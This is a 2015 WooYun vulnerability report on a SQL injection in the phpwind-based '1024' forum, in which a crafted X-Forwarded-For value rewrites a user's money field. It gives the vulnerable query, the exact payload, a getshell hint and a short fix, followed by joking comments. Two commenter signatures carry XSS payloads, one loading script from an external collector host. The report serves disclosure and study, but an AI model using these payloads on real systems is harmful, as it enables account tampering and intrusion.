当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152694

漏洞标题:一个可以让你成为1024社区最富有の人的SQL注入漏洞

相关厂商:1024社区

漏洞作者: 猪猪侠

提交时间:2015-11-07 23:26

修复时间:2015-12-22 23:28

公开时间:2015-12-22 23:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

CloudFlare的WAF也阻拦不了你成为1024社区最富有の人

详细说明:

#0 先看shell证明,提起兴趣,再看内容

shell.png


#1 注入描述
当我们在登陆1024论坛的时候,程序会更新记录我们每次登陆的IP信息,最后登录的时间,具体SQL如下

UPDATE LOW_PRIORITY pw_memberdata SET lastvisit='1446906480',thisvisit='1446906480',onlineip='8.8.8.8|1446906480|6' WHERE uid='387090'


#2 phpwind处理登陆IP的代码如下,先从客户端拿X-Forwarded-For的值

getip.png


#3 漏洞利用
控制X-Forwarded-For为SQL注入代码就可以利用了
这里1024社区的代码,仅仅限制客户端IP的长度为15,多了抛弃,当不妨碍我们成为最富有の人

sqlerror.png

漏洞证明:

#4 phpwind数据库结构,money = USD,rvrc = 威望,credit = 贡献值

CREATE TABLE pw_memberdata (
  uid MEDIUMINT(8) UNSIGNED NOT NULL DEFAULT '0',
  postnum INT(10) UNSIGNED NOT NULL DEFAULT '0',
  digests SMALLINT(6) NOT NULL DEFAULT '0',
  rvrc INT(10) NOT NULL DEFAULT '0',
  money INT(10) NOT NULL DEFAULT '0',
  credit INT(10) NOT NULL DEFAULT '0',
  currency INT(10) NOT NULL DEFAULT '0',
  editor TINYINT(1) NOT NULL DEFAULT '0',
  lastvisit INT(10) UNSIGNED NOT NULL DEFAULT '0',
  thisvisit INT(10) UNSIGNED NOT NULL DEFAULT '0',
  lastpost INT(10) UNSIGNED NOT NULL DEFAULT '0',
  onlinetime INT(10) UNSIGNED NOT NULL DEFAULT '0',
  monoltime INT(10) UNSIGNED NOT NULL DEFAULT '0',
  todaypost SMALLINT(6) UNSIGNED NOT NULL DEFAULT '0',
  monthpost SMALLINT(6) UNSIGNED NOT NULL DEFAULT '0',
  uploadtime INT(10) UNSIGNED NOT NULL DEFAULT '0',
  uploadnum SMALLINT(6) UNSIGNED NOT NULL DEFAULT '0',
  onlineip CHAR(30) NOT NULL DEFAULT '',
  starttime INT(10) UNSIGNED NOT NULL DEFAULT '0',
  postcheck CHAR(16) NOT NULL DEFAULT '',
  PRIMARY KEY uid (uid),
  KEY postnum (postnum)
) TYPE=MYISAM;


#5 突破限制,给你自己价钱

UPDATE LOW_PRIORITY pw_memberdata SET lastvisit='1446906480',thisvisit='1446906480',onlineip='{你的15个字符}|1446906480|6' WHERE uid='387090'


mysql在字段类型不匹配预先设定时,会采用强制类型转换,这里的15个字符刚好满足增加财富的需求
PS:这里可以使用指数 1e9xxxxx = 1000000000,1的后面9个0

',money='9999999


拼凑出的完整SQL如下

UPDATE LOW_PRIORITY pw_memberdata SET lastvisit='1446906480',thisvisit='1446906480',onlineip='',money='9999999|1446906480|6' WHERE uid='387090'


Data truncated for column 'money',会将9999999|1446906480|6强制类型转换为999999
#6 实战利用

xfor.png


#7 设置好后,登陆你的账号,你就有999999的USD财富了,贡献值和威望依葫芦画瓢即可

t66y.jpg


天使.png


#8 GETSHELL
后续还会发一个phpwind5前台getshell漏洞,基于上面的某些条件,就能搞到1024社区的webshell了
WooYun: Phpwind的v4/5/6/7/8命令执行漏洞
把自己的威望刷到TOP20,shell就自动躺在/data/bbs_cache里面了

getshell.png

修复方案:

# 更新一下版本,把onlineip过滤

fix.jpg

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:16 (WooYun评价)

漏洞评价:

评价

  1. 2015-11-07 23:28 | gone ( 路人 | Rank:0 漏洞数:1 | 来学习的)

    1111

  2. 2015-11-07 23:28 | _Thorns ( 普通白帽子 | Rank:1662 漏洞数:248 | WooYun is the Bigest gay place. 网络工...)

    哈哈,猪哥快!!!给我加点!

  3. 2015-11-07 23:29 | 不会游泳的鱼 ( 普通白帽子 | Rank:141 漏洞数:45 | 非著名白帽子)

    666

  4. 2015-11-07 23:37 | J0kER ( 普通白帽子 | Rank:100 漏洞数:20 | )

    求邀请码

  5. 2015-11-07 23:37 | Submit ( 普通白帽子 | Rank:527 漏洞数:120 | )

    怎么富RYB9

  6. 2015-11-07 23:41 | k0_pwn ( 实习白帽子 | Rank:96 漏洞数:13 | 专注且自由)

    猪哥无人能挡了,那么问题来了,猪哥是不是要给乌云所有人发邀请码

  7. 2015-11-07 23:44 | Nerd Tsai ( 路人 | Rank:16 漏洞数:9 | 还在努力学习中...Orz)

    猪哥爆了

  8. 2015-11-07 23:45 | Tren ( 普通白帽子 | Rank:163 漏洞数:61 | 求带求装B)

    猪哥已经无人能挡了!!!!

  9. 2015-11-07 23:47 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:460 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    猪哥的草榴帐号被搞了,一怒之下,就把草榴搞了

  10. 2015-11-07 23:47 | 碎片 ( 路人 | Rank:23 漏洞数:9 | <script src=http://www.xss8.net/?c=MjMf4...)

    666666

  11. 2015-11-07 23:52 | 随风的风 ( 普通白帽子 | Rank:211 漏洞数:76 | 微信公众号:233sec 不定期分享各种漏洞思...)

    猪哥的草榴帐号被搞了,一怒之下,就把草榴搞了

  12. 2015-11-07 23:55 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    猪哥,给大家点福利呀,求邀请码。

  13. 2015-11-07 23:59 | 动后河 ( 实习白帽子 | Rank:57 漏洞数:16 | ☭)

    怎么个积极联系官方法?

  14. 2015-11-08 00:04 | Chinalover ( 实习白帽子 | Rank:39 漏洞数:9 | 你看得到我打在屏幕上的字,却看不到我落在...)

    可啪!

  15. 2015-11-08 00:19 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)

    求验证码啊。。。

  16. 2015-11-08 00:44 | 金馆长 ( 路人 | Rank:4 漏洞数:2 | Up)

    卧槽卧槽卧槽

  17. 2015-11-08 00:59 | 林被甘霖老母草鸡摆 ( 路人 | Rank:5 漏洞数:1 | 长得帅怪林被咯!)

    -.-刚才测试了一下。有cloudflare防御好像。哎。不能拿邀请码了

  18. 2015-11-08 03:06 | 邪少 ( 实习白帽子 | Rank:75 漏洞数:12 | 百里长苏)

    @林被甘霖老母草鸡摆 好像好没公布 您是怎么知道的 透露下

  19. 2015-11-08 07:32 | Daryl ( 路人 | Rank:16 漏洞数:5 | '"><img/src=1 onerror=alert('干啥啥不会'...)

    猪哥的草榴帐号被搞了,一怒之下,就把草榴搞了

  20. 2015-11-08 09:23 | 小白鼠 ( 路人 | Rank:1 漏洞数:2 | 小呀小呀小白鼠)

    先关注下,据说猪猪侠csv已经在手。

  21. 2015-11-08 10:40 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    猪猪侠近来怒气值已满!

  22. 2015-11-08 10:47 | 路人毛 ( 实习白帽子 | Rank:64 漏洞数:25 | Please speak in Chinese.)

    今晚都是草榴人

  23. 2015-11-08 11:04 | 雷少 ( 实习白帽子 | Rank:73 漏洞数:31 | 热爱网络的爱好者,需求同道中人。)

    是时候成为真男人了

  24. 2015-11-08 11:21 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    1024

  25. 2015-11-08 11:37 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)

    绕过waf得神器哇

  26. 2015-11-08 11:48 | 無名老人 ( 路人 | Rank:15 漏洞数:3 | 干过开发,日过渗透,江湖人称: 少女杀手)

    绕过waf 得神器,要涨涨姿势

  27. 2015-11-08 12:56 | Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)

    原来草榴是猪哥干的。。。。。@猪猪侠

  28. 2015-11-08 14:45 | 林被甘霖老母草鸡摆 ( 路人 | Rank:5 漏洞数:1 | 长得帅怪林被咯!)

    @邪少 看微博自己测试啊

  29. 2015-11-08 15:18 | Q1NG ( 普通白帽子 | Rank:111 漏洞数:21 | 临 兵 斗 者 皆 阵 列 前 行 !)

    就是他 大家快找他

  30. 2015-11-08 19:08 | 乐乐、 ( 普通白帽子 | Rank:868 漏洞数:189 )

    留个言

  31. 2015-11-08 20:35 | SunnyDoll ( 实习白帽子 | Rank:63 漏洞数:20 | 职业搬砖工)

    我要涨姿势

  32. 2015-11-08 20:57 | Gnest ( 路人 | Rank:0 漏洞数:1 | 一地的白帽子)

    我们调查这么久终于有线索了!

  33. 2015-11-09 05:27 | InneRs ( 路人 | Rank:2 漏洞数:1 | 初学者)

    666666坐等草榴来认领

  34. 2015-11-09 08:42 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    搜了一下,原来是这种口味啊!!哈哈,谢谢!

  35. 2015-11-09 08:44 | Hex ( 实习白帽子 | Rank:33 漏洞数:14 | 又一天过去了,今天过得怎么样,梦想是不是...)

    厂商不敢认领,已主动忽略

  36. 2015-11-09 09:45 | SH0X8001 ( 路人 | Rank:21 漏洞数:5 | 你猜)

    那么多年还是没有邀请码啊

  37. 2015-11-09 10:03 | Space ( 路人 | Rank:9 漏洞数:6 | 程序猿)

    坐等

  38. 2015-11-09 10:57 | 水泥中的鱼 ( 路人 | Rank:30 漏洞数:4 | 我就是我,尘世中一迷途小书童。)

    厂商估计不敢认领

  39. 2015-11-09 11:10 | Annabelle ( 实习白帽子 | Rank:56 漏洞数:17 | .)

    厂商不敢认领,已主动忽略

  40. 2015-11-09 12:01 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    我是冲着厂商来的!

  41. 2015-11-09 15:21 | CHai ( 路人 | Rank:1 漏洞数:1 | 萌新。)

    1024是什么呀?

  42. 2015-11-09 15:32 | 无心sec ( 路人 | Rank:4 漏洞数:2 | →_→)

    1024是什么?

  43. 2015-11-09 16:06 | 暗羽 ( 路人 | Rank:23 漏洞数:7 | 喵呜,给人类的智商跪了)

    猪哥无人能挡了,那么问题来了,猪哥是不是要给乌云所有人发邀请码

  44. 2015-11-09 17:05 | h3hz ( 实习白帽子 | Rank:42 漏洞数:5 )

    猪哥的草榴帐号被搞了,一怒之下,就把草榴搞了

  45. 2015-11-09 17:48 | Let a person cry. ( 实习白帽子 | Rank:31 漏洞数:11 | xxoo)

    不对,是猪哥在1024下不了种子了,一怒之下就干废了1024,哈哈,求邀请码。那么多年了,还是没邀请码的路过

  46. 2015-11-09 18:02 | Dream、帝 ( 路人 | Rank:4 漏洞数:1 | w)

    这是要砝码的节奏吗,每人一个

  47. 2015-11-09 18:02 | 偶然 ( 普通白帽子 | Rank:282 漏洞数:72 | 我是天空里一片云。)

    坐等厂商认领 @草榴社区

  48. 2015-11-09 20:19 | xiaoxin ( 实习白帽子 | Rank:72 漏洞数:16 | 无)

    不要漏洞,只求地址

  49. 2015-11-09 21:32 | 雪葬爱 ( 路人 | Rank:18 漏洞数:8 | 小菜,大白菜,愿得一人心,白首不分离。)

    我先修改 然后忽略

  50. 2015-11-09 22:52 | 小钟 ( 路人 | Rank:2 漏洞数:1 | What the fuck.)

    可怕

  51. 2015-11-09 23:13 | K4r1iNNg ( 路人 | Rank:6 漏洞数:3 | 叫我k4就k4吧 方便打字... ORZ)

    感觉是个update?

  52. 2015-11-10 00:08 | 指尖的温度 ( 路人 | Rank:27 漏洞数:10 )

    来个邀请码

  53. 2015-11-10 08:10 | ω电池ω ( 路人 | Rank:4 漏洞数:2 | neusoft)

    1024

  54. 2015-11-10 09:40 | 正在行走 ( 路人 | Rank:6 漏洞数:2 | 我是唐僧请来的)

    1024

  55. 2015-11-10 10:09 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    完了,以后1024要变成了一个静态站了……

  56. 2015-11-10 16:27 | 老实先生 ( 实习白帽子 | Rank:45 漏洞数:22 | 关于理想我从来没选择放弃,即使在灰头土脸...)

    @猪猪侠 求1024邀请码 谢谢

  57. 2015-11-10 16:53 | 马杀鸡 ( 路人 | Rank:21 漏洞数:5 | 作为一匹勇敢的马,杀鸡是必不可少的)

    @猪猪侠,求邀请码啊求邀请码

  58. 2015-11-10 17:02 | 艾弗森 ( 路人 | Rank:0 漏洞数:1 | 论坛收割者)

    授權發布By 大紅鷹本次攻擊者利用偽造IP地址包含惡意代碼注入面板數據,現已修復。網上流傳一個1024.csv,那個文件是假的;----------------在後台查看記錄時,之前那個洩露漏洞的攻擊者,嘗試備份數據庫,但是失敗了,資料估計並沒有丟失;攻擊者備份數據庫,但是數據庫太大,超時失敗了,但我們還是保守一點。請會員不必過度恐慌!當然我們首是要保護所有會員的隱私和信息。

  59. 2015-11-10 17:09 | 钱塘老娘舅 ( 路人 | Rank:4 漏洞数:2 | 儿女不孝老人愁,邻里矛盾起纠纷,试试找个...)

    @艾弗森 大兄弟 社区里面混的不错啊 都代言人了

  60. 2015-11-10 17:17 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3846 漏洞数:296 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @艾弗森 大兄弟,叫大红鹰来认领漏洞啊

  61. 2015-11-30 11:46 | lostime ( 路人 | Rank:7 漏洞数:3 | CCFer, Nsclub)

    1024这种业界良心必须得大力支持

  62. 2015-11-30 17:08 | 纯情 ( 路人 | Rank:17 漏洞数:2 | 站在人生的顶端,俯视生命的千姿百态。)

    谢谢提供漏洞,邀请码没人有份。

  63. 2015-11-30 22:53 | 黑名单 ( 实习白帽子 | Rank:62 漏洞数:14 | 像个傻瓜似的,为什么。)

    求邀请码 潜水多年 也没看见邀请码

  64. 2015-12-03 14:31 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    @艾弗森 求个邀请码 大兄弟

  65. 2016-02-27 21:38 | 艾弗森 ( 路人 | Rank:0 漏洞数:1 | 论坛收割者)

    @围剿 乌云不让留联系方式?

  66. 2016-02-28 08:32 | 纯情 ( 路人 | Rank:17 漏洞数:2 | 站在人生的顶端,俯视生命的千姿百态。)

    @艾弗森 求个邀请码。私信。。

  67. 2016-02-28 21:42 | TinyMin ( 路人 | Rank:4 漏洞数:2 | 脚本非我所爱)

    暴露了1024的网址~

  68. 2016-02-28 23:01 | LaTCue ( 普通白帽子 | Rank:120 漏洞数:28 | 满脑子的艺术细菌,当然,是人体艺术。)

    求个邀请码 谢谢

  69. 2016-02-29 17:36 | 艾弗森 ( 路人 | Rank:0 漏洞数:1 | 论坛收割者)

    @纯情 没发现私信功能~

  70. 2016-02-29 17:45 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )

    联通4G 已经可以不翻墙直接访问t66y.com了

  71. 2016-02-29 23:23 | 纯情 ( 路人 | Rank:17 漏洞数:2 | 站在人生的顶端,俯视生命的千姿百态。)

    @艾弗森 右上角"短消息",然后"写消息","用户"填纯情。谢谢。。。